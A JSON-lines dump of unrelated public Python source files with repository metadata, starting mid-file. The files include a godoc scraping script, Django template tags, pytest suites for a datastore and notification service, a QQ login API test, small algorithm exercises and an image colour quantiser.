\"\"\".format(\n id=header.lower().replace(' ', '-'),\n header=header,\n contents=contents,\n)\n\ndef update_file(output_path, formatter):\n with open(os.path.join(OUTPUT_DIR, output_path), 'r+') as output_file:\n contents = output_file.read()\n contents = replace_pkg_links(contents)\n\n ih = contents.index('')\n contents = '{}{}'.format(\n contents[:ih],\n '../' * output_path.count('/'),\n contents[ih:],\n )\n\n if formatter:\n contents = formatter(contents)\n\n output_file.seek(0)\n output_file.write(''.join(contents))\n\nrun('go get golang.org/x/tools/cmd/godoc@v0.0.0-20191213221258-04c2e8eff935')\n\ngopath = os.getenv('GOPATH')\ngodoc_process = subprocess.Popen(gopath + '/bin/godoc', cwd='../')\n\n# wait 3 seconds for the above process to be ready,\n# no easy API to ensure it actually is\nsleep(30)\n\nensure_clean_dir(OUTPUT_DIR)\nprint('-> Going to scrape the godoc server, this will take some time...')\nwget_error_code = run(\n 'wget -m -k -q -erobots=off -X src/ --no-host-directories --no-use-server-timestamps http://localhost:6060',\n cwd=OUTPUT_DIR,\n timeout=300, # 5 min\n ignore_errors=True,\n)\n\nprint('-> Done scraping. Killing process')\ngodoc_process.kill()\n\nif wget_error_code not in [0, 8]: # 0 is ok, 8 is server error we don't care about\n print('!!-> wget error code', wget_error_code)\n # sys.exit(wget_error_code)\n\nprint('-> Injecting additional documentation into scraped html files')\ngames = {}\nfor filename in os.listdir(GAMES_DOCS_DIR):\n with open(os.path.join(GAMES_DOCS_DIR, filename), 'r') as game_data_file:\n parsed_file = json.load(game_data_file)\n games[parsed_file['game_name']] = parsed_file\n\n# Inject/change up the index.html file a bit to be more Cadre game centric.\ndef root_index_update_contents(contents):\n # auto collapse all sections because the vast majority of the packages\n # are redundant to go users\n contents = contents.replace('class=\"toggleVisible\"', 'class=\"toggle\"')\n\n # and slice in some additional documentation data about the games\n i = contents.index('
')\n return contents[:i] + \"\"\"\n
Joueur.go Documentation
\n\nThis is the documentation for the Go Cadre client and its various game\npackages.\n\n{}\n{}\n\"\"\".format(\n template_collapsible_section(\n 'Games', \"\"\"\n
These are the games that are available to play via the Go Client. Their\n source code is stored in the directory: games/game_name/, where\n game_name is the name of the game.\n
\n \"\"\".format(\n game_name=game_name,\n pkg_link=package_link_to(game_name),\n description=games[game_name]['description']\n ) for game_name in sorted(games.keys())\n ]))\n ),\n template_collapsible_section(\n \"Coding Your AI\", \"\"\"\n
Interfaces
\n
With the exception of your AI being a struct, all of the game\n components you will interact with are done through Go\n interfaces. This means that all attributes must be accessed via\n function calls, e.g:\n
\nplayer_name := ai.Player().Name()\n
\n
\n \n
Unless otherwise noted in the documentation, assume all interfaces are\npopulated by an instance of a struct implementing that interface. However some\nattributes, function call, etc will explicitly tell you if the returned value\ncan be nullable (nil pointer).\n
\n\n
Modifying non AI files
\n
\nEach interface type inside of games/game_name/, except for your\n ai.go should ideally not be modified. \nThey are intended to be read only constructs that hold the state of that\n object at the point in time you are reading its properties.\n
\n
\nWith that being is said, if you really wish to add functionality, such as\n helper functions, ensure they do not directly modify game state information,\n or interfere with our existing functionality, or there is a good chance your\n client will crash during gameplay with a DELTA_MERGE_FAILURE.\n
\n
Implimentation logic for the interfaces (except your AI) is all tucked away\n in games/internal/game_name_impl. It is highly reccomended not to\n modify these files as they are largey written by our \n Creer code generation tool and may need to be modified if the game\n structure is tweaked.\n
\n\n
Game Logic
\n\n
If you are attempting to figure out how the logic is executed for a game,\n that code is not here. \n All Cadre game clients are dumb state tracking\n programs that facilitate IO between a game server and your AI in whatever\n programming language you choose.\n
\n
\nIf you wish to get the actual code for a game check in the\n Cerveau game server. Its directory structure is\n similar to most clients (such as this one).\n
\n\"\"\".format(\n cadre_link='https://github.com/siggame/Cadre',\n cerveau_link='https://github.com/siggame/Cerveau',\n creer_link='https://github.com/siggame/Creer',\n )),\n) + contents[i:]\n\nupdate_file('index.html', root_index_update_contents)\n\n# for each game, add additional text explaining the game\nfor game_name, game_docs in games.items():\n def game_index_update_contents(contents):\n i = contents.index('
\n{description}\n\n
More Info
\n
\nThe full game rules for {game_name} can be found on GitHub.\n
''' % (condition, start + 5)\n\n return mark_safe(ele)\n return ''\n","repo_name":"if000else/PerfectCRM","sub_path":"kingadmin/templatetags/kingadmin_tags.py","file_name":"kingadmin_tags.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40687244296","text":"print(\"\\n**** CALCULADORA DE CALORIAS DIÁRIAS ****\")\r\nquantidade_alimento = int(input(\"\\nDigite a quantidade de alimentos ingeridos no seu dia: \"))\r\nsoma = 0\r\n\r\nfor x in range(1, quantidade_alimento+1):\r\n calorias_alimentos = float(input(\"Informe a quantidade de calorias do alimento {}: \".format(x)))\r\n soma = soma + calorias_alimentos\r\nprint(\"\\n O TOTAL DE CALORIAS INGERIDAS É DE: {} Kcal\".format(soma))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"GustavoPetry/Solving-Python","sub_path":"004 - Calculadora de Calorias.py","file_name":"004 - Calculadora de Calorias.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6475713929","text":"from os import path\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\nfrom alembic.script import ScriptDirectory\nfrom sqlalchemy import select\n\nfrom covalent_dispatcher._db import models\nfrom covalent_dispatcher._db.datastore import DataStore\n\nfrom .fixtures import workflow_fixture\n\n\n@pytest.fixture\ndef db():\n \"\"\"Instantiate and return an in-memory database.\"\"\"\n\n return DataStore(\n db_URL=\"sqlite+pysqlite:///:memory:\",\n initialize_db=True,\n )\n\n\ndef test_db_path(db: DataStore, tmp_path: Path):\n db_dir_path = tmp_path / \"db_dir\"\n db_dir_path.mkdir()\n db_path = db_dir_path / \"my_db.sqlite\"\n\n db_url = f\"sqlite+pysqlite:///{str(db_path.resolve())}\"\n\n db = DataStore(db_URL=db_url, initialize_db=True)\n assert db.db_URL == db_url\n\n\ndef test_default_db_path(db: DataStore, tmp_path: Path, mocker):\n DB_PATH = \"/tmp/my_db.sqlite\"\n\n mocker.patch(\"sqlalchemy.create_engine\")\n mocker.patch(\"sqlalchemy.orm.sessionmaker\")\n mocker.patch(\"covalent_dispatcher._db.datastore.get_config\", return_value=DB_PATH)\n\n db_url = f\"sqlite+pysqlite:///{DB_PATH}\"\n\n assert DataStore().db_URL == db_url\n\n\ndef test_run_migrations(db: DataStore, mocker):\n config_mock = Mock()\n command_mock = mocker.patch(\"covalent_dispatcher._db.datastore.command\")\n\n def get_config_mock(logging_enabled):\n return config_mock\n\n mocker.patch.object(db, \"get_alembic_config\", get_config_mock)\n\n db.run_migrations()\n command_mock.upgrade.assert_called_once_with(config_mock, \"head\")\n\n\ndef test_current_head(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n script_mock.get_current_head.return_value = MOCK_REVISION\n assert db.current_head() == MOCK_REVISION\n\n\ndef test_current_revision(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n migration_ctx_mock = Mock()\n mocker.patch(\"covalent_dispatcher._db.datastore.EnvironmentContext\")\n mocker.patch.object(db, \"engine\", Mock())\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n mocker.patch.object(\n MigrationContext, \"configure\", lambda config, environment_context=None: migration_ctx_mock\n )\n\n migration_ctx_mock.get_current_revision.return_value = MOCK_REVISION\n\n assert db.current_revision() == MOCK_REVISION\n\n\ndef test_get_alembic_config(db: DataStore, mocker):\n config_mock = mocker.patch(\"covalent_dispatcher._db.datastore.Config\")\n\n def alembic_config_init(self, provided_path):\n # ensure provided path matches project root / alembic.ini\n assert provided_path == Path(path.join(__file__, \"./../../../../alembic.ini\")).resolve()\n\n mocker.patch.object(Config, \"__init__\", alembic_config_init)\n assert db.get_alembic_config() == config_mock()\n\n\n@pytest.mark.usefixtures(\"workflow_fixture\")\ndef test_insertion(db: DataStore, workflow_fixture):\n electron_dependency = workflow_fixture[\"electron_dependency\"][0]\n with db.session() as session:\n session.add(electron_dependency)\n session.commit()\n with db.session() as session:\n statement = select(models.ElectronDependency)\n results = session.execute(statement).all()\n assert len(results) == 1\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/covalent_dispatcher_tests/_db/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"}
+{"seq_id":"33619869162","text":"import pytest\n\nimport json\n\n\n@pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.projects (name, key, tanker_project,\n tanker_keyset, intent)\n VALUES ('project_name_test', 'project_key_test', 'tanker_project_test',\n 'tanker_keyset_test', 'intent_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.templates (name, key, project_id,\n transport_type, waiting_condition, ttl)\n VALUES ('template_name_test', 'template_key_test', 1, 0, 'sent', 0)\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications (token, status,\n project_id, template_id, user_id, application, user_device_id,\n notification_params, message_title, message_body, deeplink,\n api_response, request, message_id, client_type, sent_at,\n sent_transport_type, personal_phone_id)\n VALUES ('test_token', 'skipped', 1, 1, 'test_user_id',\n 'test_application', 'test_user_device_id', '{}',\n 'test_message_title', 'test_message_body', 'test_deeplink',\n 'test_api_response', 'test_request', 'test_message_id',\n 'client-notify', '2021-07-28T18:00:00+00:00', 'push',\n 'personal_phone_id_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.user_devices\n (user_id, auth_token, active, device_id, model, brand)\n VALUES ('test_user_id', 'x_taxi_session_value', TRUE,\n 'test_user_device_id', 'model_test', 'brand_test'),\n ('test_user_id_2', 'x_taxi_session_value_1', FALSE,\n 'test_user_device_id', 'model_test', 'brand_test')\n \"\"\",\n ],\n)\n@pytest.mark.parametrize(\n 'request_json', [pytest.param({'tokens': ['test_token']})],\n)\nasync def test_200(taxi_eats_notifications, taxi_config, request_json):\n # get history\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history', json=request_json,\n )\n assert response.status_code == 200\n assert len(response.json()['notifications']) == 1\n assert (\n response.json()['notifications'][0]['application']\n == 'test_application'\n )\n assert (\n response.json()['notifications'][0]['client_type'] == 'client-notify'\n )\n assert response.json()['notifications'][0]['deeplink'] == 'test_deeplink'\n assert (\n response.json()['notifications'][0]['message_body']\n == 'test_message_body'\n )\n assert (\n response.json()['notifications'][0]['message_id'] == 'test_message_id'\n )\n assert (\n response.json()['notifications'][0]['message_title']\n == 'test_message_title'\n )\n assert (\n response.json()['notifications'][0]['sent_at']\n == '2021-07-28T18:00:00+00:00'\n )\n assert response.json()['notifications'][0]['status'] == 'skipped'\n assert response.json()['notifications'][0]['token'] == 'test_token'\n assert response.json()['notifications'][0]['user_id'] == 'test_user_id'\n assert (\n response.json()['notifications'][0]['device']\n == 'brand_test model_test'\n )\n assert (\n response.json()['notifications'][0]['personal_phone_id']\n == 'personal_phone_id_test'\n )\n assert response.json()['notifications'][0]['transport_type'] == 'push'\n\n\n@pytest.mark.parametrize(\n 'body_tags, expected_result',\n [\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {\n 'notification_token-1': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-2'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n 'notification_token-3': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-1'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n },\n marks=[\n pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.notifications_tags\n (key, value, notification_token, updated_at)\n VALUES ('order_id', 'order_id-123', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-2', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-321', 'notification_token-2', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-123', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-4', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-1', 'notification_token-3', '2021-07-28T18:00:00+00:00');\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications \n (token, status, notification_params, message_title, message_body, sent_at)\n VALUES ('notification_token-1', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-2', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-3', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-4', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00')\n \"\"\",\n ],\n ),\n ],\n id='Filtering',\n ),\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {},\n id='No tokens found',\n ),\n ],\n)\nasync def test_find_history_by_tags(\n taxi_eats_notifications, pgsql, expected_result, body_tags,\n):\n body = {'tags': body_tags}\n\n expected_tokens = expected_result.keys()\n\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history-by-tags', json=body,\n )\n assert response.status_code == 200\n\n notifications = response.json()['notifications']\n\n tokens = [item['notification']['token'] for item in notifications]\n assert sorted(tokens) == sorted(expected_tokens)\n\n for item in notifications:\n token = item['notification']['token']\n expected_tags = expected_result[token]['expected_tags']\n assert sorted(item['tags'], key=lambda x: x['value']) == sorted(\n expected_tags, key=lambda x: x['value'],\n )\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_notifications/test_notification_history.py","file_name":"test_notification_history.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"43169901848","text":"# _*_ coding:utf-8 _*_\r\nimport requests\r\nfrom Scripts.ConfigFile import *\r\nfrom Scripts.GetCurrentTime import *\r\nfrom Scripts.GetReport import *\r\n\r\n\r\nclass QQLogin:\r\n def qq_login(self, openid):\r\n \"\"\"\r\n QQ登录\r\n :param openid:\r\n :return:\r\n \"\"\"\r\n post_data = {\"type\": \"qq\", # QQ: 'qq'; 微信: 'weixin'\r\n \"openid\": openid, # 第三方平台的唯一标识\r\n \"auth_token\": \"\" # 第三方平台的授权码\r\n }\r\n headers = {\"Cache - Control\": \"no - cache\",\r\n \"Content - Type\": \"text / html;charset = UTF - 8\",\r\n 'Accept': 'application/json',\r\n \"Date\": \"%s\" % GetCurrentTime().getHeaderTime(),\r\n \"Proxy - Connection\": \"Keep - alive\",\r\n \"Server\": \"nginx / 1.9.3(Ubuntu)\",\r\n \"Transfer - Encoding\": \"chunked\"}\r\n third_login_url = \"http://%s/user/thirdlogin\" % ConfigFile().host()\r\n request = requests.post(third_login_url, data=post_data, headers=headers)\r\n time = GetCurrentTime().getCurrentTime()\r\n status_code = request.status_code\r\n try:\r\n if status_code in (200, 422):\r\n json = request.json()\r\n info = json[\"info\"]\r\n return json\r\n else:\r\n info = request.reason\r\n finally:\r\n log_list = [u'QQ登录', u\"post\", third_login_url, str(post_data), time, status_code, info]\r\n GetReport().get_report() # 生成或打开日志文件\r\n GetReport().record_into_report(log_list) # 逐条写入日志\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = QQLogin()\r\n print(r.qq_login(\"openid\"))\r\n","repo_name":"AbigaleLiu/WuKongDianJing","sub_path":"Scripts/APIScripts/Other/QQLogin.py","file_name":"QQLogin.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"402293509","text":"def maxRotateFunction(nums) -> int:\n # from given pattern\n # derived the formula for F(k) as follows\n # F(k) = F(k-1) + SUM + N * arr[N - k]\n\n n = len(nums)\n S = sum(nums)\n\n prefixSum = 0\n for i, val in enumerate(nums):\n prefixSum += (i * val)\n\n maxVal = prefixSum\n for i in range(1, n):\n prefixSum = prefixSum + S - (n * nums[-i])\n maxVal = max(maxVal, prefixSum)\n\n return maxVal\n\n\nn1 = [4, 3, 2, 6]\nn2 = [100]\n\nprint(maxRotateFunction(n1))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Microsoft_Company_1/RotateFunction.py","file_name":"RotateFunction.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22923116043","text":"from math import sqrt\n\nclass Solution:\n # @param A : integer\n # @return a list of integers\n def sieve(self, A):\n if A < 2:\n return []\n check_primes = [1]* A\n check_primes.append(1)\n \n primes = []\n primes.append(2)\n primes.append(3)\n primes.append(5)\n primes.append(7)\n primes.append(11)\n \n sqa = int(sqrt(A))\n for i in xrange(3, sqa+1, 2):\n if check_primes[i] ==1:\n for j in xrange(i*i, A+1, i): # start at square of current prime as an optimization\n check_primes[j] = 0\n primes.append(i)\n next = sqa if sqa % 2 == 1 else sqa+1\n for i in xrange(next, A+1, 2):\n if check_primes[i] == 1:\n primes.append(i)\n return primes\n \n def primesum(self, A):\n primes = self.sieve(A)\n set_primes = set(primes)\n for i in primes:\n if A-i in set_primes:\n return (i, A-i)\n return []\n","repo_name":"rsubbu55/coding-prep","sub_path":"i-b/math/prime-sum.py","file_name":"prime-sum.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"43316076024","text":"from tkinter import *\nimport re\n\n\nroot = Tk()\nroot.minsize(800, 600)\ntext = Text(root, width=800//10, height=600//20)\n\n#re.sub('[ES]', 'a', s)\ndef writeOut():\n global text\n words = text.get(\"1.0\",\"end-1c\")\n new_words = []\n hyphenated_words = re.findall(r\"\\w+(?:- \\S+\\w+)+\", words)\n for x in hyphenated_words:\n nx = x.replace(\"- \", \"\")\n words = words.replace(x, nx)\n print(words)\n\n## print(type(hyphenated_words))\n## print(re.search(r\"\\w+(?:- \\S+\\w+)+\", words).group(0))\n #print(re.sub(r\"\\w+(?:- \\S+\\w+)+\", \"\\b\", words))\n f = open(\"output.txt\", \"w\")\n f.write(text.get(\"1.0\",\"end-1c\"))\n f.close()\n\n\n\n\nB = Button(root, text=\"Format And Writeout\", command=writeOut)\nB.place(x = 800//2, y = 600//3)\ntext.pack()\nB.pack()\nroot.mainloop()\n","repo_name":"vasunep0306/antihiphen","sub_path":"perfect_formatter.py","file_name":"perfect_formatter.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12407933048","text":"from __future__ import annotations\n\nfrom psycopg2.extras import DictCursor\n\nfrom wazo_agid import agid\nfrom xivo_dao.resources.conference import dao as conference_dao\n\n\ndef incoming_conference_set_features(\n agi: agid.FastAGI, cursor: DictCursor, args: list[str]\n) -> None:\n conference_id = int(agi.get_variable('XIVO_DSTID'))\n\n try:\n conference = conference_dao.get(conference_id)\n except ValueError as e:\n agi.dp_break(str(e))\n\n menu = 'xivo-default-user-menu'\n user_profile = f'xivo-user-profile-{conference.id}'\n if conference.pin:\n for _ in range(4):\n agi.answer()\n pin = agi.get_data('conf-getpin', 10000, 80)\n if pin == conference.pin:\n break\n elif pin == conference.admin_pin:\n menu = 'xivo-default-admin-menu'\n user_profile = f'xivo-admin-profile-{conference.id}'\n break\n else:\n agi.stream_file('conf-invalidpin')\n else:\n agi.dp_break(\n 'Unable to join the conference room, wrong pin'\n f'(conference_id: {conference.id}, name: {conference.name})'\n )\n\n agi.set_variable('WAZO_CONFBRIDGE_ID', conference.id)\n agi.set_variable('WAZO_CONFBRIDGE_TENANT_UUID', conference.tenant_uuid)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_BRIDGE_PROFILE', f'xivo-bridge-profile-{conference.id}'\n )\n agi.set_variable('WAZO_CONFBRIDGE_USER_PROFILE', user_profile)\n agi.set_variable('WAZO_CONFBRIDGE_MENU', menu)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_PREPROCESS_SUBROUTINE', conference.preprocess_subroutine or ''\n )\n agi.appexec('CELGenUserEvent', f'WAZO_CONFERENCE, NAME: {conference.name or \"\"}')\n\n\nagid.register(incoming_conference_set_features)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/modules/incoming_conference_set_features.py","file_name":"incoming_conference_set_features.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38373921898","text":"import numpy as np\nimport cv2 as cv\nimport operator\nfrom heapq import nlargest\n\nclass kdTree():\n\tdef __init__(self, rootid):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.rootid = rootid\n\ndef get_leaf_nodes(node):\n\tleafs = []\n\tif node is not None:\n\t\tif node.left is None and node.right is None:\n\t\t\tleafs.append(node.rootid)\n\t\tleafs += get_leaf_nodes(node.left) + get_leaf_nodes(node.right)\n\treturn leafs\n\ndef readImage(imgName):\n\timg = cv.imread(imgName)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[0])):\n\t\t\timg[i][j] = img[i][j]/8\n\t\t\timg[i][j] = img[i][j]*8\n\treturn img\n\ndef calHistogram(img):\n\thistogram = {}\n\tfor row in img:\n\t\tfor pixel in row:\n\t\t\tif (pixel[0], pixel[1], pixel[2]) in histogram:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] += 1\n\t\t\telse:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] = 0\n\treturn histogram\n\ndef showImage(name):\n\tcv.imshow('Quantised Image', name)\n\tk = cv.waitKey(0)\n\tif k == 27:\n\t\tcv.destroyAllWindows()\n\ndef growTree(points, k):\n\n\tif k == 1:\n\t\treturn None\n\n\tvar = (np.var(points, axis=0)).tolist()\n\tind = var.index(max(var))\n\tmed = (np.median(points, axis=0))[ind]\n\n\troot = kdTree(med)\n\tleft = [x for x in points if x[ind] < med]\n\tright = [x for x in points if x[ind] >= med]\n\n\tif k/2 != 1:\n\t\troot.left = growTree(left, k/2)\n\t\troot.right = growTree(right, k-k/2)\n\telse:\n\t\tavg = [0,0,0]\n\t\tfor i in range(0, len(points)):\n\t\t\t\tavg += points[i]\n\t\tavg = avg/float(len(points))\n\n\t\troot.rootid = avg\n\n\treturn root\n\ndef findKColors(image, K):\n\tlst = []\n\tfor i in range(0, len(image)):\n\t\tfor j in range(0, len(image[0])):\n\t\t\tlst.append(image[i][j])\n\ttree = growTree( lst , K)\n\n\tkColors = get_leaf_nodes(tree)\n\n\treturn kColors\n\ndef findDist(pixel, color):\n\td = 0\n\tfor i in range(len(pixel)):\n\t\td += (int(pixel[i]) - int(color[i]))**2\n\treturn d\n\ndef quantise(k_colors, histogram):\n\tlookUpt = {}\n\ti=0\n\tfor h in histogram.keys():\n\t\tminD = findDist(h, k_colors[0])\n\t\tval = k_colors[0]\n\t\tfor color in k_colors:\n\t\t\td = findDist(h, color)\n\t\t\tif d < minD:\n\t\t\t\tminD = d\n\t\t\t\tval = color\n\t\tlookUpt[h] = val\n\t\ti += 1\n\treturn lookUpt\n\ndef createFinalImage(img, lookUpt):\n\tfinalImg = img\n\tfor i in range(len(finalImg)):\n\t\tfor j in range(len(finalImg[0])):\n\t\t\tfinalImg[i][j] = lookUpt[(finalImg[i][j][0], finalImg[i][j][1], finalImg[i][j][2])]\n\treturn finalImg\n\nimage_path = input(\"Path to image: \")\nk = int(input(\"Quantisation level: \"))\n\nimage = readImage(image_path)\nhistogram = calHistogram(image)\nk_colors = findKColors(image, k)\nlookUpt = quantise(k_colors, histogram)\nfinalImg = createFinalImage(image, lookUpt)\nshowImage(finalImg)\n\n# # r = []\n# # g = []\n# # b = []\n# # for i in range(0, len(finalImg)):\n# # \tfor j in range(0, len(finalImg[0])):\n# # \t\tr.append(finalImg[0])\n# # \t\tg.append(finalImg[1])\n# # \t\tb.append(finalImg[2])\n\t\t\n# Hdat = []\n# Ldat = []\n# Sdat = [] \n# for row in finalImg:\n# \tfor pixel in row:\n# \t\th,l,s = colorsys.rgb_to_hls(pixel[0]/255., pixel[1]/255., pixel[2]/255.)\n# \t\tHdat.append(int(h*255.))\n# \t\tLdat.append(int(l*255.))\n# \t\tSdat.append(int(s*255.))\n\n# r.putdata(Hdat)\n# g.putdata(Ldat)\n# b.putdata(Sdat)\n# newimg = Image.merge('RGB',(r,g,b))\n# newimg.save('lenaHSV.png')","repo_name":"harsimrats/COL783","sub_path":"1/1b.py","file_name":"1b.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42834493394","text":"import io\nimport re\nimport json\nimport shutil\nimport tempfile\nimport os.path\n\nfrom django.core.validators import validate_email\nfrom rest_framework.exceptions import NotFound\n\nimport analitico\nimport analitico.plugin\nimport analitico.utilities\n\nfrom analitico.factory import Factory\n\nimport api.models\nimport api.plugin\n\n# import plugins for Supermercato24 (if available)\nimport s24.plugin # NOQA\n\n# pylint: disable=no-member\n\n\n##\n## ServerFactory\n##\n\n# analitico://item_type/item_id/asset_class/asset_id, eg: analitico://dataset/ds_xxx/assets/data.csv\nANALITICO_ASSET_RE = (\n r\"analitico:\\/\\/(?P[\\a-z]+)s\\/(?P[\\w]+)\\/(?Pdata|assets)\\/(?P[-\\w\\.]+)\"\n)\n\n\nclass ServerFactory(Factory):\n \"\"\" A factory used to run notebooks and plugins in the context of a server with direct access to items via SQL \"\"\"\n\n def __init__(self, job=None, mkdtemp=True, **kwargs):\n super().__init__(**kwargs)\n if job:\n self.set_attribute(\"job\", job)\n # special temp directory which is deleted automatically?\n if mkdtemp:\n self._temp_directory = tempfile.mkdtemp(prefix=\"analitico_temp_\")\n\n ##\n ## Temp and cache directories\n ##\n\n # Temporary directory which is deleted when factory is disposed\n _temp_directory = None\n\n def get_temporary_directory(self):\n \"\"\" Temporary directory is deleted when ServerFactory is disposed \"\"\"\n return self._temp_directory if self._temp_directory else super().get_temporary_directory()\n\n def get_artifacts_directory(self):\n \"\"\" Artifacts directory is a subdirectory of temporary and is deleted automatically \"\"\"\n artifacts_dir = os.path.join(self.get_temporary_directory(), \"artifacts\")\n if not os.path.isdir(artifacts_dir):\n os.mkdir(artifacts_dir)\n return artifacts_dir\n\n ##\n ## URL retrieval, authorization and caching\n ##\n\n def get_cache_asset(self, item, asset_class, asset_id):\n \"\"\" \n Returns filename of cached asset after downloading it if necessary. \n File should be used as read only and copied if it needs to be modified.\n \"\"\"\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n assert asset\n # name of the file in cache is determined by its hash so all files are unique and\n # we do not need to check versions, eg. if we have it with the correct name it's\n # the correct version and we can save a rountrip to check with the server\n storage_file = self.get_cache_filename(asset[\"hash\"])\n\n # if not in cache already download it from storage\n if not os.path.isfile(storage_file):\n storage = item.storage\n assert storage\n _, storage_stream = storage.download_object_via_stream(asset[\"path\"])\n _, storage_file = self.get_cached_stream(storage_stream, asset[\"hash\"])\n return storage_file\n\n def get_url_stream(self, url, binary=False):\n \"\"\" Job runner retrieves assets directly from cloud storage while using super for regular URLs \"\"\"\n # temporarily while all internal urls are updated prepend analitico://\n if url.startswith(\"workspaces/ws_\"):\n url = \"analitico://\" + url\n\n # job runner reads assets straight from cloud storage\n match = re.search(ANALITICO_ASSET_RE, url)\n if match:\n # find asset indicated in the url\n item_id = match.group(\"item_id\")\n asset_class = match.group(\"asset_class\")\n asset_id = match.group(\"asset_id\")\n\n # TODO should check that current requestor has access rights to this item\n item = self.get_item(item_id)\n\n # replace shorthand /data/csv with /data/data.csv\n wants_json = False\n if asset_class == \"data\":\n if asset_id == \"csv\":\n asset_id = \"data.csv\"\n if asset_id == \"info\":\n asset_id = \"data.csv\"\n wants_json = True\n\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n if wants_json:\n # format the same way as if it was returned by the server\n asset_json = json.dumps({\"data\": asset})\n return io.StringIO(asset_json)\n cache_filename = self.get_cache_asset(item, asset_class, asset_id)\n return open(cache_filename, \"rb\")\n # base class handles regular URLs\n return super().get_url_stream(url)\n\n def upload_artifacts(self, item):\n \"\"\" Uploads all files in the artifacts directory to the given item's data assets \"\"\"\n directory = self.get_artifacts_directory()\n for path in os.listdir(directory):\n fullpath = os.path.join(directory, path)\n # process only files (skip directories and .info files)\n if os.path.isfile(fullpath) and not path.endswith(\".info\"):\n path_size = os.path.getsize(fullpath)\n with open(fullpath, \"rb\") as f:\n # if asset has a .info companion read as extra info on the asset\n extras_path = fullpath + \".info\"\n extras = analitico.utilities.read_json(extras_path) if os.path.isfile(extras_path) else {}\n if fullpath.endswith(\".csv\") and \"rows\" not in extras:\n extras[\"rows\"] = analitico.utilities.get_csv_row_count(fullpath)\n # upload asset and extras, item will take care of saving to database\n item.upload_asset_stream(f, \"data\", path, path_size, None, path, extras)\n\n def restore_artifacts(self, item, artifacts_path=None, symlink=True):\n \"\"\" Restores artifacts stored by item to the artifacts directory \"\"\"\n assets = item.get_attribute(\"data\")\n if not assets:\n self.warning(\"ServerFactory.restore_artifacts - item '%s' has no 